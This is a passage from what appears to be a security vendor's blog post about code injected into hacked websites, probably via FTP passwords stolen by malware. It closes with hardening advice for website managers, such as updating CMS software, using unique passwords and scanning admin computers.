The injected code
It is either written in cleartext or encoded and therefore obfuscated.
Our scanners detect this injection as HTML:Script-inf and therefore, G Data users with an active HTTP-filtering, will be alerted right away when visiting one of those infected sites.
What can happen?
It’s a fact that the attackers can upload anything to the hacked webserver as long as they have the possibility to log-in. There are manifold possibilities the attackers can misuse the server for. For example, they can both use it to inject redirecting scripts or upload malware and therefore use it as a malware host, etc.
How were the attackers able to inject the code in the first place?
There are many ways how attackers can gain access to website management systems. Recently, there have been a lot of reports about exploited vulnerabilities in content management systems which lead to code injections and dangerous situations. Remember the ticking time bomb on hacked WordPress pages?
Many of the infected pages we have seen use popular free CMS solutions like WordPress or Joomla, but many don’t. Therefore, we suspect that the source of all evil is another one.
From what we know by now, it seems most likely that computers of users managing the websites have been infected with password stealing malware and this malware has provided the attackers with the necessary data (especially ftp passwords) to enter the websites.
The importance of securing ones computer has already been illustrated numerous times – especially because of the fact that one single infected computer can, in succession, harm thousands of others: Attackers gained access to website management systems and injected code into websites which harm the visiting users.
What can website managers do?
- To secure your site, your website management system should be up to date at all time. Install the latest software from the developer’s website.
- The same applies to all used plug-ins and themes for your websites.
- In case you own the web server, ensure that it is up to date and in a secured state. If you rented web space on a remote server, get in contact with your provider to inform yourself about the issue.
- Make sure that all passwords for all accounts (CMS, FTP, etc.) are chosen wisely. An administration account should not be named “admin” and every account needs to have a unique password that is sufficiently secure. Read more about information on secure passwords.
- Disable/Delete inactive accounts for your website management systems.
- Scan and monitor all computers that have access to your website management systems with comprehensive security solutions to avoid getting infected with (password stealing) malware.
Leave a reply